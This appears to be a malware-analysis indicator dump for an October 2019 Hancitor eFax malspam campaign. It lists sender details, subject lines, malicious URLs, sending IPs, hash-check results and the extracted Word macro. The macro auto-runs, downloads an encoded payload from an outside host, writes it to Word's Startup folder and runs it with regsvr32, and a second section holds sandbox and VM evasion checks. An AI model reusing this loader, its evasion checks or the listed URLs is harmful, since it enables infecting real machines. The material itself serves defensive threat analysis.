2019-10-17 Hancitor

1. Sender
2. ========
3. eFax j2 Global, Inc. <eFax@shiplawyer.com>
4.  
5. Subjects
6. =========
7. You've received efax Notification
8. You have received efax Message
9. This is efax Notice
10. This is an electronic eFax Notice
11. You've got eFax Notice
12. This is an electronic eFax Notification
13. This is eFax Notification
14. You've received eFax Notice
15.  
16. Embedded links
17. ===============
18. http://cmstephensconsulting.com/7izt/rjdcowboy.php
19. http://dbh.dixitninad.com/.well-known/sylvek1978.php
20. http://developermurtaza.website/js/wilsonderyeck.php
21. http://directoryredlands.com/wp-content/tmeyer42.php
22. http://matexpress.com/map/shaneogrady.php
23. http://nchr.vn/wp-content/seanbwarbird.php
24. http://rva.agentgrowthpartners.com/.well-known/williamw141955.php
25. http://sha256.uaround.ru/presentation/wmatthews11.php
26. http://socialprofile.in/scopic/walli_sw.php
27. http://spsconsultancyservices.com/wp-admin/sti.plus.php
28. http://swacvirals.com/wp-admin/walpasley.php
29. http://wondarshop.in/assests/zumathe.php
30. http://workxpro.co.in/wp-admin/rklug.php
31.  
32. Email IPs
33. ===========
34. shiplawyer.com (173-167-51-106-cpennsylvania.hfc.comcastbusiness.net [173.167.51.106])
35. shiplawyer.com (rrcs-71-40-138-178.se.biz.rr.com [71.40.138.178])
36. shiplawyer.com (24-35-137-143.fidnet.com [24.35.137.143])
37. shiplawyer.com (h207.163.117.75.dynamic.ip.windstream.net [75.117.163.207])
38. shiplawyer.com (c-73-154-113-150.hsd1.wv.comcast.net [73.154.113.150])
39. shiplawyer.com (071-045-160-192.res.spectrum.com [71.45.160.192])
40. shiplawyer.com (72-16-245-65.customerip.birch.net [72.16.245.65])
41. shiplawyer.com ([76.4.44.68])
42. shiplawyer.com (66-188-168-9.dhcp.stcd.mn.charter.com [66.188.168.9])
43. shiplawyer.com (64-72-38-48.flntcmtc01.com.sta.suddenlink.net [64.72.38.48])
44. shiplawyer.com (static-71-172-32-163.nwrknj.fios.verizon.net [71.172.32.163])
45. shiplawyer.com ([206.63.185.26])
46. shiplawyer.com (50-255-199-149-static.hfc.comcastbusiness.net [50.255.199.149])
47. shiplawyer.com ([12.180.172.18])
48. shiplawyer.com ([66.209.42.145])
49. shiplawyer.com ([96.71.254.6])
50. shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
51. shiplawyer.com ([199.190.54.215])
52. shiplawyer.com (50-252-19-58-static.hfc.comcastbusiness.net [50.252.19.58])
53. shiplawyer.com (cpe-75-86-78-26.wi.res.rr.com [75.86.78.26])
54. shiplawyer.com (c-24-6-32-99.hsd1.ca.comcast.net [24.6.32.99])
55. shiplawyer.com (c-68-37-17-12.hsd1.mi.comcast.net [68.37.17.12])
56. shiplawyer.com (h121.205.191.173.dynamic.ip.windstream.net [173.191.205.121])
57. shiplawyer.com (rrcs-208-125-27-66.nyc.biz.rr.com [208.125.27.66])
58. shiplawyer.com (cpe-104-172-16-234.socal.res.rr.com [104.172.16.234])
59.  
60. Munin results
61. ===============
62. _________ _ _ ______ _____ ______
63. | | | | | \ | | | | | | \ \ | | | | \ \ /.)
64. | | | | | | | | | | | | | | | | | | | | /)\|
65. |_| |_| |_| \_|__|_| |_| |_| _|_|_ |_| |_| // /
66. /'" "
67.  
68. Online Hash Checker for Virustotal and Other Services
69. Florian Roth - 0.13.0 April 2019
70.  
71.  
72. [+] Found results CSV from previous run: check-results_attach.csv
73. [+] Appending results to file: check-results_attach.csv
74. [ ] Processing /attach/e_fax_46164.doc ...
75. [ ] Processing /attach/e_fax_46164_4616.zip ...
76. [+] Processing 2 lines ...
77.  
78. 1 / 2 > Unknown
79. HASH: a8645292476686686c82fe04f5378f7e0d141b2bcf54c89970a18cc366342a1d COMMENT: /attach/e_fax_46164.doc
80. RESULT: - / -
81.  
82. 2 / 2 > Unknown
83. HASH: 81b35cdf0d1e8a239641c25dd32165d658992f1a9058190b0ae773fc70bd8725 COMMENT: /attach/e_fax_46164_4616.zip
84. RESULT: - / -
85.  
86. Macro script
87. ==============
88. Sub AutoopeN(): loYscbk: End Sub
89.  
90. Sub loYscbk()
91.  
92. On Error Resume Next
93. Set ess = CreateObject(InternetExplorer.Application)
94. RSOgEnmZmP.CreateFolder (p)
95. ess.Navigate http://maritimelawyers.us/download.html
96. State = 0
97. Do Until State = 4: DoEvents: State = ess.readyState: Loop
98. Dim RlAqIQeVT: RlAqIQeVT = ess.Document.Body.getElementsByTagName(pre).Item(0).innerHTML
99. p = Environ(APPDATA) & \Microsoft\Word\Startup\
100. Set RSOgEnmZmP = CreateObject(Scripting.FileSystemObject)
101. If Not RSOgEnmZmP.FolderExists(p) Then
102. RSOgEnmZmP.CreateFolder (p)
103. End If
104. Randomize
105. p = p & Int(Rnd * 999) 1 & F.wll
106. Set objFile = RSOgEnmZmP.CreateTextFile(p, True)
107. With objFile: For lp = 1 To Len(RlAqIQeVT) Step 2: .Write Chr(CByte(&H & Mid(RlAqIQeVT, lp, 2))): Next: End With: objFile.Close
108. Set objWMIService = GetObject(winmgmts:Win32_Process)
109. objWMIService.Create regsvr32.exe-sp,,,processid
110. MsgBox The document is protected, you will need to specify a password to unlock.
111. Dim myUserForm As UserForm1
112. Set myUserForm = New UserForm1
113. myUserForm.Show
114. Application.Quit
115. End Sub
116.  
117. Questionable part of script
118. =============================
119. Public Sub checkApps()
120. printMsg "[*] WordBasic.AppGetNames ..."
121. d = False
122. tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
123. Set ws = GetObject("winmgmts:\\.\root\cimv2")
124. Dim names() As String
125. ReDim names(WordBasic.AppCount())
126. WordBasic.AppGetNames names
127. For Each n In names
128. For Each tn In tns
129. If InStr(LCase(n), tn) > 0 Then
130. d = True
131. End If
132. Next
133. Next
134. If d Then
135. printMsg "DETECTED"
136. Else
137. printMsg "OK"
138. End If
139. End Sub
140.  
141. Public Sub checkAppCount()
142. printMsg "[*] Checking WordBasic.AppCount() ..."
143. If WordBasic.AppCount() < 50 Then
144. printMsg "DETECTED"
145. Else
146. printMsg "OK"
147.  
148. End If
149. End Sub
150.  
151. Public Sub checkPreciseFileName()
152. printMsg "[*] Checking Precise Filename ..."
153. badName = False
154. If ActiveDocument.Name <> "Pafish.docm" Then
155. badName = True
156. End If
157. If badName Then
158. printMsg "DETECTED"
159. Else
160. printMsg "OK"
161. End If
162.  
163. End Sub
164.  
165. Public Sub checkFilenameHash()
166. printMsg "[*] Checking Filename Hashname ..."
167. hexchars = "0123456789abcdef"
168. c = 0
169. For i = 1 To Len(ThisDocument.Name)
170. s = Mid(LCase(ThisDocument.Name), i, 1)
171. If InStr(s, hexchars) > 0 Then
172. c = c + 1
173. End If
174. Next
175.  
176. If c >= (Len(ThisDocument.Name) - 5) Then
177. printMsg "DETECTED"
178. Else
179. printMsg "OK"
180. End If
181. End Sub
182.  
183. Public Sub checkFilenameBad()
184. printMsg "[*] Checking Bad Filename ..."
185. badName = False
186. badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
187. For Each n In badNames
188. If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
189. badName = True
190. End If
191. Next
192.  
193. If badName Then
194. printMsg "DETECTED"
195. Else
196. printMsg "OK"
197. End If
198. End Sub
199.  
200. Public Sub checkTasks()
201. printMsg "[*] Checking Application.Tasks.Name ..."
202. badTask = False
203. badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
204. For Each Task In Application.Tasks
205. For Each badTaskName In badTaskNames
206. If InStr(LCase(Task.Name), badTaskName) > 0 Then
207. badTask = True
208. End If
209. Next
210. Next
211. If badTask Then
212. printMsg "DETECTED"
213. Else
214. printMsg "OK"
215. End If
216. End Sub
217.  
218. Public Sub checkCores()
219. printMsg "[*] Checking Win32_Processor.NumberOfCores ..."
220. badCores = 0
221. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
222. Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
223. For Each objItem In colItems
224. If objItem.NumberOfCores < 3 Then
225. badCores = True
226. End If
227. Next
228.  
229. If badCores Then
230. printMsg "DETECTED"
231. Else
232. printMsg "OK"
233. End If
234. End Sub
235.  
236. Public Sub checkBios()
237. printMsg "[*] Checking Win32_Bios.SMBIOSBIOSVersion & SerialNumber ..."
238. badBios = False
239. badBiosNames = Array("virtualbox", "vmware", "kvm")
240. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
241. Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
242. For Each objItem In colItems
243. For Each badName In badBiosNames
244. If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
245. badBios = True
246. End If
247. If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
248. badBios = True
249. End If
250. Next
251. Next
252. If badBios Then
253. printMsg "DETECTED"
254. Else
255. printMsg "OK"
256. End If
257. End Sub
258.  
259. Public Sub checkPnP()
260. printMsg "[*] Checking Win32_PnPEntity.DeviceId ..."
261. badPNP = False
262. badPNPNames = Array("VEN_80EE", "VEN_15AD")
263. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
264. Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
265. For Each objItem In colItems
266. For Each badName In badPNPNames
267. If InStr(LCase(objItem.DeviceId), badName) > 0 Then
268. badPNP = True
269. End If
270. Next
271. Next
272. If badPNP Then
273. printMsg "DETECTED"
274. Else
275. printMsg "OK"
276. End If
277. End Sub
278.  
279. Public Sub checkUsername()
280. printMsg "[*] Checking Win32_ComputerSystem.Username ..."
281. badUsername = False
282. badUsernames = Array("admin", "malfind", "sandbox", "test")
283. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
284. Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
285. For Each objItem In colItems
286. For Each badName In badUsernames
287. If InStr(LCase(objItem.UserName), badName) > 0 Then
288. badUsername = True
289. End If
290. Next
291. Next
292. If badUsername Then
293. printMsg "DETECTED"
294. Else
295. printMsg "OK"
296. End If
297. End Sub
298.  
299. Public Sub checkPartOfDomain()
300. printMsg "[*] Checking Win32_ComputerSystem.PartOfDomain ..."
301. partOfDomain = False
302. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
303. Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
304. For Each objItem In colItems
305. If objItem.partOfDomain Then
306. partOfDomain = True
307. End If
308. Next
309. If partOfDomain Then
310. printMsg "OK"
311. Else
312. printMsg "DETECTED"
313. End If
314. End Sub
315.  
316. Public Sub checkZoneIdentifier()
317. printMsg "[*] Checking Zone.Identifier ..."
318. If CreateObject("Scripting.FileSystemObject").fiLEExistS(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
319. printMsg "OK"
320. Else
321. printMsg "DETECTED"
322. End If
323. End Sub
324.  
325. Public Sub checkNbrOfTask()
326. printMsg "[*] Checking Application.Tasks.Count ..."
327. If Application.Tasks.Count < 3 Then
328. printMsg "DETECTED"
329. Else
330. printMsg "OK"
331. End If
332. End Sub
333.  
334. Public Sub checkRecentDocs()
335. printMsg "[*] Checking Application.RecentFiles.Count ..."
336. If Application.RecentFiles.Count < 3 Then
337. printMsg "DETECTED"
338. Else
339. printMsg "OK"
340. End If
341. End Sub
342.  
343. Public Function printMsg(msg)
344. ActiveDocument.Range.Text = ActiveDocument.Range.Text & msg
345. Set RSOgEnmZmP = CreateObject("Scripting.FileSystemObject")
346. outFile = "pafish.log"
347. Set objFile = RSOgEnmZmP.CreateTextFile(outFile, True)
348. objFile.Write ActiveDocument.Range.Text & msg
349. objFile.Close
350. End Function
351.  
352. Public Sub mark()
353. Text = ActiveDocument.Range.Text
354. toks = Split(Text, vbCr)
355. c = 0
356. For Each tok In toks
357. l = Len(tok)
358. If tok = "OK" Then
359. ActiveDocument.Range(c, c + l).Font.Color = vbGreen
360. End If
361. If tok = "DETECTED" Then
362. ActiveDocument.Range(c, c + l).Font.Color = vbRed
363. End If
364. c = c + l + 1
365. Next
366. ActiveDocument.Range.ParagraphFormat.SpaceBefore = 0
367. ActiveDocument.Range.ParagraphFormat.SpaceAfter = 0
368. ActiveDocument.Range.Font.Size = 8
369. End Sub